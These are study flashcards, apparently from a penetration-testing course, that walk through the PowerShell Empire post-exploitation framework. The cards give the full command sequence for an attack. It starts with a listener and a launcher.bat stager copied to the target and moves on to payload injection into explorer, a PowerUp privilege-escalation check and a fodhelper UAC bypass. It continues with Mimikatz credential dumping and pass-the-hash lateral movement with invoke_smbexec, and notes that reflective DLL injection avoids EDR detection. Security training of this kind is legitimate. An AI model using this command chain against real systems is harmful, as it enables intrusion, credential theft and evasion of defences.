PowerShell Empire Flashcards
What is the name of the Github repository of Empire?
PowerShellEmpire
How do you install Empire?
- Clone Github repo
- cd Empire
- sudo ./setup/install.sh
- sudo ./Empire
How do you see a list of Empire listeners?
- (Empire) > listeners
- - (Empire: listeners) > uselistener
What are the available listeners in Empire?
- dbx
- http = most basic
- http_com
- http_foreign
- http_hop
- http_mapi
- meterpreter
- redirector = creates a pivot that enables communication with an internal network
How do you select the http listener and select a Host listener IP of 10.11.0.4?
- (Empire: listeners) > uselistener http
- (Empire: listeners) > set Host 10.11.0.4
- (Empire: listeners/http) > execute
If you are in a selected listener, how to you return to the main Listener Menu?
(Empire: listeners/http) > back
How can you list the available Stagers?
- ** Make sure you are in the Listener main menu ***
- - (Empire: listeners) > usestager
What are some support examples that Empire Stagers provide?
- DLLs
- HTML applications
- Microsoft Office Macros
How do you select the ‘windows/launcher_bat’ Stager for the HTTP Listener?
– (Empire: listeners) > usestager windows/launcher_bat
– Empire: stager/windows/launcher_bat) > set Listener http
– (Empire: stager/windows/launcher_bat) > execute
** Here is the output **
[] Stager output written out to: /tmp/launcher.bat
————————————–
** The Stager must then be copied to the target and executed
How can we examine what the ‘windows/launcher_bat’ Stager does?
– kali@kali:/opt/Empire$ cat /tmp/launcher.bat
What is an Empire ‘Agent’?
- the final payload retrieved by the Stager
- it allows us to execute commands and interact with the system
- the Stager deletes itself and exits once it finishes execution
What happens once the ‘Agent’ is operational on the target?
- the ‘Agent’ will set up an AES-encrypted communication channel with the listener using the data portion of the HTTP GET and POST requests
How do we get the ‘Agent’ operational on the target?
- We execute copy the Stager output to the target and execute it
- For example, launcher.bat
- C:\Users\Offsec\Documents> launcher.bat
Once the ‘Agent’ is operational, how do we view it in Empire?
(Empire: stager/windows/launcher_bat) > agents
Once the ‘Agent’ is operational, how do we interact with it in Empire?
(Empire: agents) > interact S2Y5XW1L
How do we migrate our payload into a process on the target from the ‘Agent’ interaction in Empire?
- Display processes running on the target
- - (Empire: S2Y5XW1L) > ps - Inject the Payload
- - (Empire: S2Y5XW1L) > psinject http 3568
- ————————————-
* ** In the example, the process selected for payload injection was ‘explorer’ ***
- ————————————- - See the new Agent is created
- - (Empire: DWZ49BAP) > agents - Switch to the new Agent
- - (Empire: agents) > interact DWZ49BAP
- ————————————
* ** You must switch to the new Agent that is generated after injecting the payload into the running process ***
How do you list the available Empire modules?
– (Empire: S2Y5XW1L) > usemodule
Which Empire module focuses on local client and AD enumeration?
situational_awareness
What is the module path for Powerview?
situational_awareness/network/powerview
How do you display the options of the module?
info
What does it mean if the ‘NeedsAdmin’ field is set to ‘True’?
- the script requires local Administrators permissions
What does it mean if the ‘OpsecSafe’ field is set to ‘True’?
- will avoid leaving behind indicators of compromise, such as temporary disk files or new user accounts
What does it mean if the ‘MinLanguageVersion’ field is set to ‘True’?
- describes the minimum version of PowerShell required to execute the script
- ** Especially relevant with Windows 7 or Windows Server 2008 R2 that ship with PowerShell v.2
What does it mean if the ‘Background’ field is set to ‘True’?
- the module executes in the background w/o visibility for the victim
What does it mean if the ‘OutputExtension’ field is set to ‘True’?
- tells us the output format if the module returns output to a file
How would you initiate the ‘get_user’ module?
– > (powershell/situational_awareness/ network/powerview/get_user) > execute
What Empire module uses several techniques based on misconfigurations such as unquoted service paths and improper permissions on service executables?
How do you initiate it?
- The ‘allchecks’ module within the ‘privesc’ category
– (Empire: powershell/situational_awareness/ network/powerview/get_user) > usemodule powe
rshell/privesc/powerup/allchecks
– (Empire: powershell/privesc/powerup/ allchecks) > execute
—————————————–
** ‘allchecks’ tells you is if this user is a local admin **
[*] Checking if user is in a local group with administrative privileges…
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.
Which Empire module can bypass UAC and launch a high-integrity PowerShell Empire agent?
What is required to use this?
How do you launch it?
- bypassuac_fodhelper module in the ‘privesc’ category
- requires access to a local administrator account
- (Empire: S2Y5XW1L) > usemodule privesc/bypassuac_fodhelper
- Then need to set the ‘http’ Listener
- (Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http
- Finally, execute the module
- (Empire: powershell/privesc/bypassuac_fodhelper) > execute
Which module category are the Mimikatz modules located?
- credentials
What do the asterisks next to Mimikatz modules mean?
- they require a high-integrity Empire agent
How does Empire load Mimikatz libraries into the agent?
Why does this help prevent detection?
- Empire uses reflective DLL injection to load the Mimikatz library into the agent directly from memory
- Loading malicious executables in this way minimizes the risk of detection since most EDR solutions only analyze files stored on the hard drive
What module allows you to get the passwords of logged on users? What command allows you to get passwords from logged on users?
- credentials/mimikatz/logonpasswords
- mimikatz(powershell) # sekurlsa::logonpasswords
- To get the credentials that are written to the credential store, use ‘creds’
- (Empire: K678VC13) > creds
Once we have user credentials, what is our goal?
- lateral movement
- logon to additional systems until we reach our objective
How can you use ‘lateral_movement’ module category to get a System shell?
- We can use the ‘lateral_movement/invoke_ smbexec’ module, with the following parameters:
- ComputerName = hostname of the Windows 10 client
- Listener = http
- Username = ‘jeff_admin’
- Domain = ‘corp.com’
- Hash = the ‘jeff_admin’ hash obtained from Mimikatz ‘logonpasswords’ module
- (Empire: K678VC13) > usemodule lateral_movement/invoke_smbexec
- (Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName client251
- (Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http
- (Empire: powershell/lateral_movement/invoke_smbexec) > set Username jeff_admin
- (Empire: powershell/lateral_movement/invoke_smbexec) > set Hash e2b475c11da2a0748290d8
- (Empire: powershell/lateral_movement/invoke_smbexec) > set Domain corp.com
- (Empire: powershell/lateral_movement/invoke_smbexec) > execute
- (Empire: agents) > interact UXVZ2NC3
